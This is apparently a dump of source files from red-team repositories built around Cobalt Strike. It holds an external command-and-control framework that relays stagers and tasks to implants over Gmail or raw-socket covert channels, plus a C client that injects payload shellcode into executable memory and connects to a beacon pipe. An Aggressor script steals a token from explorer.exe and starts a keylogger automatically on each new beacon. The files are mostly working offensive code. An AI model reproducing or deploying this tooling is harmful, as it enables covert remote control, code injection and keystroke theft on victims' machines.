# Send stager to the client 52 | if config.verbose: 53 | print commonUtils.color("Sending stager to client") 54 | commonUtils.sendData(stager_payload, beaconId) 55 | 56 | # Rrieve the metadata we need to relay back to the server 57 | if config.verbose: 58 | print commonUtils.color("Awaiting metadata response from client") 59 | # Only one response, so this should be the first element of the array 60 | metadata = commonUtils.retrieveData(beaconId)[0] 61 | 62 | # Send the metadata frame to the external_c2 server 63 | if config.verbose: 64 | print commonUtils.color("Sending metadata to c2 server") 65 | if config.debug: 66 | print (commonUtils.color("METADATA: ", status=False, yellow=True) + "%s") % (metadata) 67 | commonUtils.sendFrameToC2(sock, metadata) 68 | 69 | # Pretend we have error handling, return 0 if everything is Gucci 70 | 71 | return 0 -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/server/establishedSession/__init__.py: -------------------------------------------------------------------------------- 1 | import config 2 | from utils import commonUtils 3 | 4 | def checkForTasks(sock): 5 | """ 6 | Poll the c2 server for new tasks 7 | """ 8 | 9 | chunk = commonUtils.recvFrameFromC2(sock) 10 | if chunk < 0: 11 | if config.debug: 12 | print (commonUtils.color("Attempted to read %d bytes from c2 server", status=False, yellow=True)) %(len(chunk)) 13 | # break # This should probably just return None or something 14 | return None 15 | else: 16 | if config.debug: 17 | if len(chunk) > 1: 18 | print (commonUtils.color("Recieved %d bytes from c2 server", status=False, yellow=True)) % (len(chunk)) 19 | else: 20 | print (commonUtils.color("Recieved empty task from c2 server", status=False, yellow=True)) 21 | if len(chunk) > 1: 22 | if config.verbose: 23 | print (commonUtils.color("Recieved new task from C2 server!") + "(%s bytes)") % (str(len(chunk))) 24 | if config.debug: 25 | print (commonUtils.color("NEW TASK: ", status=False, yellow=True) + "%s") % (chunk) 26 | return chunk 27 | 28 | ########## 29 | 30 | 31 | 32 | #def checkForResponse(sock): 33 | def checkForResponse(beaconId): 34 | """ 35 | Check the covert channel for a response from the client. 36 | 37 | Args: 38 | beaconId (str) - Identifier to determine which beacon we're getting 39 | a response from 40 | """ 41 | 42 | recvdResponse = commonUtils.retrieveData(beaconId) 43 | if config.debug: 44 | if len(recvdResponse) > 1: 45 | print (commonUtils.color("Recieved %d bytes from client", status=False, yellow=True)) % (len(recvdResponse)) 46 | else: 47 | print (commonUtils.color("Recieved empty response from client", status=False, yellow=True)) 48 | if len(recvdResponse) > 1: 49 | if config.verbose: 50 | print (commonUtils.color("Recieved new task from C2 server!") + "(%s bytes)") % (str(len(recvdResponse))) 51 | if config.debug: 52 | print (commonUtils.color("RESPONSE: ", status=False, yellow=True) + "%s") % (recvdResponse) 53 | 54 | 55 | return recvdResponse 56 | 57 | def relayResponse(sock, response): 58 | # Relays the response from the client to the c2 server 59 | # 'response', will have already been decoded from 'establishedSession.checkForResponse()' 60 | # -- Why is this it's own function? Because I have no idea what I'm doing 61 | if config.debug: 62 | print commonUtils.color("Relaying response to c2 server", status=False, yellow=True) 63 | commonUtils.sendFrameToC2(sock, response) 64 | 65 | def relayTask(task, beaconId): 66 | # Relays a new task from the c2 server to the client 67 | # 'task' will be encoded in the 'commonUtils.sendData()' function. 68 | if config.debug: 69 | print commonUtils.color("Relaying task to client", status=False, yellow=True) 70 | commonUtils.sendData(task, beaconId) 71 | -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/server/utils/encoders/encoder_b64url.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import urllib 3 | 4 | def encode(data): 5 | data = base64.b64encode(data) 6 | return urllib.quote_plus(data)[::-1] 7 | 8 | def decode(data): 9 | data = urllib.unquote(data[::-1]) 10 | return base64.b64decode(data) 11 | -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/server/utils/encoders/encoder_base64.py: -------------------------------------------------------------------------------- 1 | # A simple encoder module for Und3rf10w's implementation of the external_c2 spec for Cobalt Strike that simples base64 encodes/decodes . 2 | import base64 3 | 4 | def encode(data): 5 | return base64.b64encode(data) 6 | 7 | def decode(data): 8 | return base64.b64decode(data) 9 | -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/start_externalc2.cna: -------------------------------------------------------------------------------- 1 | # Start the external_c2 server by binding to 0.0.0.0:2222 2 | externalc2_start("0.0.0.0", 2222); -------------------------------------------------------------------------------- /Und3rf10w/Pushover/pushover-cs: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [[ $# -gt 0 ]]; then 3 | title=$1 4 | shift 5 | a=$@ 6 | else 7 | read a; 8 | fi 9 | 10 | pushover () { 11 | curl -s -F "token=$1" -F "user=$2" -F "title=$3" -F "message=$a" https://api.pushover.net/1/messages.json 12 | } 13 | 14 | # sample pushover user config 15 | # add a line for each user you wish to receive a message 16 | # pushover "$title" "$a" #sample_username1 17 | -------------------------------------------------------------------------------- /Und3rf10w/Pushover/pushover.cna: -------------------------------------------------------------------------------- 1 | # This script adds basic pushover functionality to Cobalt Strike 2 | # Ensure that you configure the pushover users in pushover-cs, ensure it is executeable 3 | # @Und3rf10w 4 | 5 | on ready { 6 | elog("Pushover notifications are now configured"); 7 | } 8 | 9 | on event_notify { 10 | $push = exec("/usr/bin/pushover-cs CS:System_Event $2 $+ : $1"); 11 | @pushdata = readAll($push); 12 | closef($push); 13 | } 14 | 15 | on event_join { 16 | $push = exec("/usr/bin/pushover-cs CS:User_Joined $2 $+ : $1 has joined"); 17 | @pushdata = readAll($push); 18 | closef($push); 19 | } 20 | 21 | on event_newsite { 22 | $push = exec("/usr/bin/pushover-cs CS:New_Site_Added $3 $+ : $1 $+ : $2 "); 23 | @pushdata = readAll($push); 24 | closef($push); 25 | } 26 | 27 | on event_action { 28 | $push = exec("/usr/bin/pushover-cs CS:Action_Performed $2 $+ : < $+ $3 $+ >: $1 "); 29 | @pushdata = readAll($push); 30 | closef($push); 31 | } 32 | 33 | on event_public { 34 | $push = exec("/usr/bin/pushover-cs CS:New_Message $3 $+ : < $+ $1 $+ >: $2 "); 35 | @pushdata = readAll($push); 36 | closef($push); 37 | } 38 | 39 | on event_quit { 40 | $push = exec("/usr/bin/pushover-cs CS:User_Left $2 $+ : $1 has quit"); 41 | @pushdata = readAll($push); 42 | closef($push); 43 | } 44 | 45 | on beacon_initial { 46 | $push = exec("/usr/bin/pushover-cs CS:New_Beacon New Beacon Received - ID: $1 | Hostname: " . binfo($1, "computer")); 47 | @pushdata = readAll($push); 48 | closef($push); 49 | } 50 | 51 | on ssh_initial { 52 | $push = exec("/usr/bin/pushover-cs CS:New_SSH New SSH Session Received - ID: $1 | Hostname " . binfo($1, "computer")); 53 | @pushdata = readAll($push); 54 | closef($push); 55 | } 56 | -------------------------------------------------------------------------------- /Und3rf10w/auto-keylogger.cna: -------------------------------------------------------------------------------- 1 | sub getexplorerpid { 2 | bps($1, lambda({ 3 | local('$pid $name $entry'); 4 | foreach $entry (split("\n", $2)) { 5 | ($name, $ppid, $pid, $arch) = split("\\s+", $entry); 6 | println($entry); 7 | # println("Name: $name PID: $pid "); 8 | if ($name eq "explorer.exe") { 9 | # $1 is our Beacon ID, $pid is the PID of explorer.exe 10 | [$callback: $1, $pid]; 11 | } 12 | } 13 | }, $callback => $2)); 14 | } 15 | 16 | 17 | on beacon_initial { 18 | getexplorerpid($1, { 19 | bsteal_token($1, int($2)); 20 | bkeylogger($1, $2, "x64"); 21 | }); 22 | blog($1, "Automatic keylogger activated"); 23 | bnote($1, "Auto-keylogger") 24 | } -------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/gmail/c2file_dll.c: -------------------------------------------------------------------------------- 1 | /* a quick-client for Cobalt Strike's External C2 server based on code from @armitagehacker */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #define PAYLOAD_MAX_SIZE 512 * 1024 8 | #define BUFFER_MAX_SIZE 1024 * 1024 9 | 10 | 11 | /* read a frame from a handle */ 12 | DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) { 13 | DWORD size = 0, temp = 0, total = 0; 14 | /* read the 4-byte length */ 15 | ReadFile(my_handle, (char * ) & size, 4, & temp, NULL); 16 | 17 | /* read the whole thing in */ 18 | while (total < size) { 19 | // xychix added 1 line 20 | Sleep(3000); 21 | ReadFile(my_handle, buffer + total, size - total, & temp, NULL); 22 | total += temp; 23 | } 24 | return size; 25 | } 26 | 27 | /* write a frame to a file */ 28 | DWORD write_frame(HANDLE my_handle, char * buffer, DWORD length) { 29 | DWORD wrote = 0; 30 | printf("in write_frame we have: %s",buffer); 31 | WriteFile(my_handle, (void * ) & length, 4, & wrote, NULL); 32 | return WriteFile(my_handle, buffer, length, & wrote, NULL); 33 | //return wrote; 34 | } 35 | 36 | HANDLE start_beacon(char * payload, unsigned int pylen){ 37 | DWORD length = (DWORD) pylen; 38 | /* inject the payload stage into the current process */ 39 | char * payloadE = VirtualAlloc(0, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 40 | memcpy(payloadE, payload, length); 41 | printf("Injecting Code, %d bytes\n", length); 42 | CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) payloadE, (LPVOID) NULL, 0, NULL); 43 | /* 44 | * connect to our Beacon named pipe */ 45 | HANDLE handle_beacon = INVALID_HANDLE_VALUE; 46 | while (handle_beacon == INVALID_HANDLE_VALUE) { 47 | handle_beacon = CreateFileA("\\\\.\\pipe\\foobar", 48 | GENERIC_READ | GENERIC_WRITE, 49 | 0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS, NULL); 50 | 51 | } 52 | return(handle_beacon); 53 | } -------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/gmail/c2file_dll.h: -------------------------------------------------------------------------------- 1 | #ifndef c2file_H__ 2 | #define c2file_H__ 3 | 4 | DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) 5 | void write_frame(HANDLE my_handle, char * buffer, DWORD length) 6 | HANDLE start_beacon(char * payload, DWORD length) 7 | 8 | #endif -------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/gmail/compile_dll.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | i686-w64-mingw32-gcc -shared c2file_dll.c -o c2file.dll -------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/raw_socket/c2file_dll.c: -------------------------------------------------------------------------------- 1 | /* a quick-client for Cobalt Strike's External C2 server based on code from @armitagehacker */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #define PAYLOAD_MAX_SIZE 512 * 1024 8 | #define BUFFER_MAX_SIZE 1024 * 1024 9 | 10 | 11 | /* read a frame from a handle */ 12 | DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) { 13 | DWORD size = 0, temp = 0, total = 0; 14 | /* read the 4-byte length */ 15 | ReadFile(my_handle, (char * ) & size, 4, & temp, NULL); 16 | 17 | /* read the whole thing in */ 18 | while (total < size) { 19 | // xychix added 1 line 20 | Sleep(3000); 21 | ReadFile(my_handle, buffer + total, size - total, & temp, NULL); 22 | total += temp; 23 | } 24 | return size; 25 | } 26 | 27 | /* write a frame to a file */ 28 | DWORD write_frame(HANDLE my_handle, char * buffer, DWORD length) { 29 | DWORD wrote = 0; 30 | printf("in write_frame we have: %s",buffer); 31 | WriteFile(my_handle, (void * ) & length, 4, & wrote, NULL); 32 | return WriteFile(my_handle, buffer, length, & wrote, NULL); 33 | //return wrote; 34 | } 35 | 36 | HANDLE start_beacon(char * payload, unsigned int pylen){ 37 | DWORD length = (DWORD) pylen; 38 | /* inject the payload stage into the current process */ 39 | char * payloadE = VirtualAlloc(0, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 40 | memcpy(payloadE, payload, length); 41 | printf("Injecting Code, %d bytes\n", length); 42 | CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) payloadE, (LPVOID) NULL, 0, NULL); 43 | /* 44 | * connect to our Beacon named pipe */ 45 | HANDLE handle_beacon = INVALID_HANDLE_VALUE; 46 | while (handle_beacon == INVALID_HANDLE_VALUE) { 47 | handle_beacon = CreateFileA("\\\\.\\pipe\\foobar", 48 | GENERIC_READ | GENERIC_WRITE, 49 | 0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS, NULL); 50 | 51 | } 52 | return(handle_beacon); 53 | } -------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/raw_socket/c2file_dll.h: -------------------------------------------------------------------------------- 1 | #ifndef c2file_H__ 2 | #define c2file_H__ 3 | 4 | DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) 5 | void write_frame(HANDLE my_handle, char * buffer, DWORD length) 6 | HANDLE start_beacon(char * payload, DWORD length) 7 | 8 | #endif -------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/raw_socket/compile_dll.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | i686-w64-mingw32-gcc -shared c2file_dll.c -o c2file.dll -------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/server/config.py: -------------------------------------------------------------------------------- 1 | # TODO: Have a proper function that reads in a config 2 | 3 | # DEBUG: 4 | ############################################ 5 | ############################################ 6 | # Address of External c2 server 7 | EXTERNAL_C2_ADDR = "127.0.0.1" 8 | 9 | # Port of external c2 server 10 | EXTERNAL_C2_PORT = "2222" 11 | 12 | # The name of the pipe that the beacon should use 13 | C2_PIPE_NAME = "foobar" 14 | 15 | # A time in milliseconds that indicates how long the External C2 server should block when no new tasks are available 16 | C2_BLOCK_TIME = 100 17 | 18 | # Desired Architecture of the Beacon 19 | C2_ARCH = "x86" 20 | 21 | # How long to wait (in seconds) before polling the server for new tasks/responses 22 | IDLE_TIME = 5 23 | 24 | ENCODER_MODULE = "encoder_b64url" 25 | TRANSPORT_MODULE = "transport_gmail" 26 | 27 | ########################################### 28 | # DEBUG: 29 | 30 | # Anything taken in from argparse that you want to make avaialable goes here: 31 | verbose = False 32 | debug = False -------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/server/configureStage/__init__.py: -------------------------------------------------------------------------------- 1 | import config 2 | from utils import commonUtils 3 | 4 | def configureOptions(sock, arch, pipename, block): 5 | # This whole function should eventually be refactored into an elaborate forloop so that we can 6 | # support additional beacon options down the road 7 | # send the options 8 | if config.verbose: 9 | print commonUtils.color("Configuring stager options") 10 | 11 | beacon_arch = "arch=" + str(arch) 12 | if config.debug: 13 | print commonUtils.color(beacon_arch, status=False, yellow=True) 14 | commonUtils.sendFrameToC2(sock, beacon_arch) 15 | 16 | beacon_pipename = "pipename=" + str(pipename) 17 | if config.debug: 18 | print commonUtils.color(beacon_pipename, status=False, yellow=True) 19 | commonUtils.sendFrameToC2(sock, beacon_pipename) 20 | 21 | beacon_block = "block=" + str(block) 22 | if config.debug: 23 | print commonUtils.color(beacon_block, status=False, yellow=True) 24 | commonUtils.sendFrameToC2(sock, beacon_block) 25 | 26 | def requestStager(sock): 27 | commonUtils.sendFrameToC2(sock, "go") 28 | 29 | stager_payload = commonUtils.recvFrameFromC2(sock) 30 | 31 | return stager_payload 32 | 33 | def loadStager(sock): 34 | # Send options to the external_c2 server 35 | configureOptions(sock, config.C2_ARCH, config.C2_PIPE_NAME, config.C2_BLOCK_TIME) 36 | 37 | if config.debug: 38 | print commonUtils.color("stager configured, sending 'go'", status=False, yellow=True) 39 | 40 | # Request stager 41 | stager_payload = requestStager(sock) 42 | 43 | if config.debug: 44 | print (commonUtils.color("STAGER: ", status=False, yellow=True) + "%s") % (stager_payload) 45 | 46 | # Prep stager payload 47 | if config.verbose: 48 | print commonUtils.color("Encoding stager payload") 49 | # Trick, this is actually done during sendData() 50 | 51 | # Send stager to the client 52 | if config.verbose: 53 | print commonUtils.color("Sending stager to client") 54 | commonUtils.sendData(stager_payload) 55 | 56 | # Rrieve the metadata we need to relay back to the server 57 | if config.verbose: 58 | print commonUtils.color("Awaiting metadata response from client") 59 | metadata = commonUtils.retrieveData() 60 | 61 | # Send the metadata frame to the external_c2 server 62 | if config.verbose: 63 | print commonUtils.color("Sending metadata to c2 server") 64 | if config.debug: 65 | print (commonUtils.color("METADATA: ", status=False, yellow=True) + "%s") % (metadata) 66 | commonUtils.sendFrameToC2(sock, metadata) 67 | 68 | # Pretend we have error handling, return 0 if everything is Gucci 69 | 70 | return 0 -------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/server/establishedSession/__init__.py: -------------------------------------------------------------------------------- 1 | import config 2 | from utils import commonUtils 3 | 4 | def checkForTasks(sock): 5 | """ 6 | Poll the c2 server for new tasks 7 | """ 8 | 9 | chunk = commonUtils.recvFrameFromC2(sock) 10 | if chunk < 0: 11 | if config.debug: 12 | print (commonUtils.color("Attempted to read %d bytes from c2 server", status=False, yellow=True)) %(len(chunk)) 13 | # break # This should probably just return None or something 14 | return None 15 | else: 16 | if config.debug: 17 | if len(chunk) > 1: 18 | print (commonUtils.color("Recieved %d bytes from c2 server", status=False, yellow=True)) % (len(chunk)) 19 | else: 20 | print (commonUtils.color("Recieved empty task from c2 server", status=False, yellow=True)) 21 | if len(chunk) > 1: 22 | if config.verbose: 23 | print (commonUtils.color("Recieved new task from C2 server!") + "(%s bytes)") % (str(len(chunk))) 24 | if config.debug: 25 | print (commonUtils.color("NEW TASK: ", status=False, yellow=True) + "%s") % (chunk) 26 | return chunk 27 | 28 | ########## 29 | 30 | 31 | 32 | #def checkForResponse(sock): 33 | def checkForResponse(): 34 | """ 35 | Check the covert channel for a response from the client 36 | """ 37 | 38 | recvdResponse = commonUtils.retrieveData() 39 | if config.debug: 40 | if len(recvdResponse) > 1: 41 | print (commonUtils.color("Recieved %d bytes from client", status=False, yellow=True)) % (len(recvdResponse)) 42 | else: 43 | print (commonUtils.color("Recieved empty response from client", status=False, yellow=True)) 44 | if len(recvdResponse) > 1: 45 | if config.verbose: 46 | print (commonUtils.color("Recieved new task from C2 server!") + "(%s bytes)") % (str(len(recvdResponse))) 47 | if config.debug: 48 | print (commonUtils.color("RESPONSE: ", status=False, yellow=True) + "%s") % (recvdResponse) 49 | 50 | 51 | return recvdResponse 52 | 53 | def relayResponse(sock, response): 54 | # Relays the response from the client to the c2 server 55 | # 'response', will have already been decoded from 'establishedSession.checkForResponse()' 56 | # -- Why is this it's own function? Because I have no idea what I'm doing 57 | if config.debug: 58 | print commonUtils.color("Relaying response to c2 server", status=False, yellow=True) 59 | commonUtils.sendFrameToC2(sock, response) 60 | 61 | def relayTask(task): 62 | # Relays a new task from the c2 server to the client 63 | # 'task' will be encoded in the 'commonUtils.sendData()' function. 64 | if config.debug: 65 | print commonUtils.color("Relaying task to client", status=False, yellow=True) 66 | commonUtils.sendData(task) 67 | -------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/server/utils/commonUtils.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | import config 4 | def importModule(modName, modType): 5 | """ 6 | Imports a passed module as either an 'encoder' or a 'transport'; called with either encoder.X() or transport.X() 7 | """ 8 | prep_global = "global " + modType 9 | exec(prep_global) 10 | importName = "import utils." + modType + "s." + modName + " as " + modType 11 | exec(importName, globals()) 12 | 13 | def createSocket(): 14 | # Borrowed from https://github.com/outflanknl/external_c2/blob/master/python_c2ex.py 15 | d = {} 16 | d['sock'] = socket.create_connection((config.EXTERNAL_C2_ADDR, int(config.EXTERNAL_C2_PORT))) 17 | d['state'] = 1 18 | return (d['sock']) 19 | 20 | def sendFrameToC2(sock, chunk): 21 | slen = struct.pack('